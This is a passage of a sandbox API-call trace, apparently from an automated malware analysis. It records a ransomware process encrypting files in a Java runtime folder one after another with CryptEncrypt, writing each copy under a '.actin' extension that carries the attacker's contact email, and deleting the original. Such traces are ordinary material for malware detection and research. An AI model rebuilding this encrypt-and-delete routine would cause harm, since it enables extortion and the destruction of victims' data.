files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0149.423] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1156672) returned 1 [0149.423] CloseHandle (hObject=0x2f4) returned 1 [0149.423] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll")) returned 0x20 [0149.423] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0149.423] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0149.423] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0149.423] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0149.423] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0149.423] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3370) returned 1 [0149.423] CryptSetKeyParam (hKey=0xac3370, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0149.423] ReadFile (in: hFile=0x2f4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x110100, lpOverlapped=0x0) returned 1 [0149.579] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x110100, dwBufLen=0x110100 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x110100) returned 1 [0149.602] WriteFile (in: hFile=0x2e4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x110100, lpOverlapped=0x0) returned 1 [0149.622] ReadFile (in: hFile=0x2f4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0xa540, lpOverlapped=0x0) returned 1 [0149.622] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xa550, dwBufLen=0xa550 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xa550) returned 1 [0149.622] WriteFile (in: hFile=0x2e4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xa550, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xa550, lpOverlapped=0x0) returned 1 [0149.623] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3170) returned 1 [0149.623] CryptSetKeyParam (hKey=0xac3170, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0149.623] CryptEncrypt (in: hKey=0xac3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50, dwBufLen=0x50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50) returned 1 [0149.623] CryptDestroyKey (hKey=0xac3170) returned 1 [0149.623] WriteFile (in: hFile=0x2e4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x102, lpOverlapped=0x0) returned 1 [0149.623] CryptDestroyKey (hKey=0xac3370) returned 1 [0149.623] CloseHandle (hObject=0x2f4) returned 1 [0149.623] CloseHandle (hObject=0x2e4) returned 1 [0149.623] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\npdeployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\npdeployjava1.dll")) returned 1 [0149.625] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0149.625] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_socket.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0149.626] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=24640) returned 1 [0149.626] CloseHandle (hObject=0x2e4) returned 1 [0149.626] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_socket.dll")) returned 0x20 [0149.626] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_socket.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0149.626] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_socket.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0149.626] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0149.626] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0149.626] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_socket.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0149.626] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3030) returned 1 [0149.627] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0149.627] ReadFile (in: hFile=0x2e4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x6040, lpOverlapped=0x0) returned 1 [0149.868] CryptEncrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x6050, dwBufLen=0x6050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x6050) returned 1 [0149.868] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x6050, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x6050, lpOverlapped=0x0) returned 1 [0149.869] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3370) returned 1 [0149.869] CryptSetKeyParam (hKey=0xac3370, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0149.869] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0149.869] CryptDestroyKey (hKey=0xac3370) returned 1 [0149.869] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0149.869] CryptDestroyKey (hKey=0xac3030) returned 1 [0149.869] CloseHandle (hObject=0x2e4) returned 1 [0149.869] CloseHandle (hObject=0x2f4) returned 1 [0149.870] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_socket.dll")) returned 1 [0149.871] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0149.871] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0149.871] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=265792) returned 1 [0149.871] CloseHandle (hObject=0x2f4) returned 1 [0149.871] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll")) returned 0x20 [0149.871] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0149.872] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0149.872] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0149.872] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0149.872] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0149.873] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2d70) returned 1 [0149.873] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0149.873] ReadFile (in: hFile=0x2f4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x40e40, lpOverlapped=0x0) returned 1 [0149.879] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40e50, dwBufLen=0x40e50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40e50) returned 1 [0149.879] WriteFile (in: hFile=0x2e4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x40e50, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x40e50, lpOverlapped=0x0) returned 1 [0149.884] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2db0) returned 1 [0149.884] CryptSetKeyParam (hKey=0xac2db0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0149.884] CryptEncrypt (in: hKey=0xac2db0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0149.884] CryptDestroyKey (hKey=0xac2db0) returned 1 [0149.884] WriteFile (in: hFile=0x2e4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0149.884] CryptDestroyKey (hKey=0xac2d70) returned 1 [0149.884] CloseHandle (hObject=0x2f4) returned 1 [0149.885] CloseHandle (hObject=0x2e4) returned 1 [0149.885] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll")) returned 1 [0149.888] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0149.888] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0149.888] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=455744) returned 1 [0149.888] CloseHandle (hObject=0x2e4) returned 1 [0149.888] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll")) returned 0x20 [0149.888] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0149.888] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0149.888] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0149.888] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0149.888] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0149.892] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2e70) returned 1 [0149.892] CryptSetKeyParam (hKey=0xac2e70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0149.892] ReadFile (in: hFile=0x2e4, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x6f440, lpOverlapped=0x0) returned 1 [0150.094] CryptEncrypt (in: hKey=0xac2e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x6f450, dwBufLen=0x6f450 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x6f450) returned 1 [0150.107] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x6f450, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x6f450, lpOverlapped=0x0) returned 1 [0150.115] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac32b0) returned 1 [0150.115] CryptSetKeyParam (hKey=0xac32b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0150.115] CryptEncrypt (in: hKey=0xac32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0150.115] CryptDestroyKey (hKey=0xac32b0) returned 1 [0150.115] WriteFile (in: hFile=0x2f4, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0150.115] CryptDestroyKey (hKey=0xac2e70) returned 1 [0150.115] CloseHandle (hObject=0x2e4) returned 1 [0150.115] CloseHandle (hObject=0x2f4) returned 1 [0150.438] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glib-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glib-lite.dll")) returned 1 [0150.474] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0150.474] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0150.474] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=34368) returned 1 [0150.474] CloseHandle (hObject=0x308) returned 1 [0150.474] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe")) returned 0x20 [0150.474] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0150.475] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0150.475] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0150.475] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0150.475] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0150.475] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2ef0) returned 1 [0150.475] CryptSetKeyParam (hKey=0xac2ef0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0150.475] ReadFile (in: hFile=0x308, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x8640, lpOverlapped=0x0) returned 1 [0150.477] CryptEncrypt (in: hKey=0xac2ef0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x8650, dwBufLen=0x8650 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x8650) returned 1 [0150.477] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x8650, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x8650, lpOverlapped=0x0) returned 1 [0150.479] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2d30) returned 1 [0150.479] CryptSetKeyParam (hKey=0xac2d30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0150.479] CryptEncrypt (in: hKey=0xac2d30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0150.479] CryptDestroyKey (hKey=0xac2d30) returned 1 [0150.479] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0150.479] CryptDestroyKey (hKey=0xac2ef0) returned 1 [0150.479] CloseHandle (hObject=0x308) returned 1 [0150.479] CloseHandle (hObject=0x2f8) returned 1 [0150.479] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe")) returned 1 [0150.480] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0150.480] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0150.481] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=15936) returned 1 [0150.481] CloseHandle (hObject=0x2f8) returned 1 [0150.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe")) returned 0x20 [0150.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0150.481] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0150.481] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0150.481] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0150.481] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0150.482] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2d30) returned 1 [0150.482] CryptSetKeyParam (hKey=0xac2d30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0150.482] ReadFile (in: hFile=0x2f8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x3e40, lpOverlapped=0x0) returned 